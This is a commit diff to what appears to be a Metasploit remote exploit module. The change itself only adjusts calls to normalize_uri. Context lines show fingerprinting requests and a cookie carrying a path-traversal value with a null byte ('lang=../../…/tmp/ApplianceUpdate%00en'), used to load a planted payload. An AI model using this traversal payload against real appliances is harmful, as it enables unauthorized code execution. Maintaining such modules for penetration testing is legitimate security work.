Fix use of normalize_uri
parent
b4fa535f2b
commit
6073e6f2dc
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri(uri, "")
|
'uri' => normalize_uri(uri)
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/
|
if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/
|
||||||
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' => { 'Cookie' => "lang=fr" },
|
'headers' => { 'Cookie' => "lang=fr" },
|
||||||
'uri' => normalize_uri(uri, "")
|
'uri' => normalize_uri(uri)
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/
|
if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/
|
||||||
|
@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },
|
'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },
|
||||||
'uri' => normalize_uri(uri, "")
|
'uri' => normalize_uri(uri)
|
||||||
})
|
})
|
||||||
|
|
||||||
# If we don't get a 200 when we request our malicious payload, we suspect
|
# If we don't get a 200 when we request our malicious payload, we suspect
|
||||||
|
|
Loading…
Reference in New Issue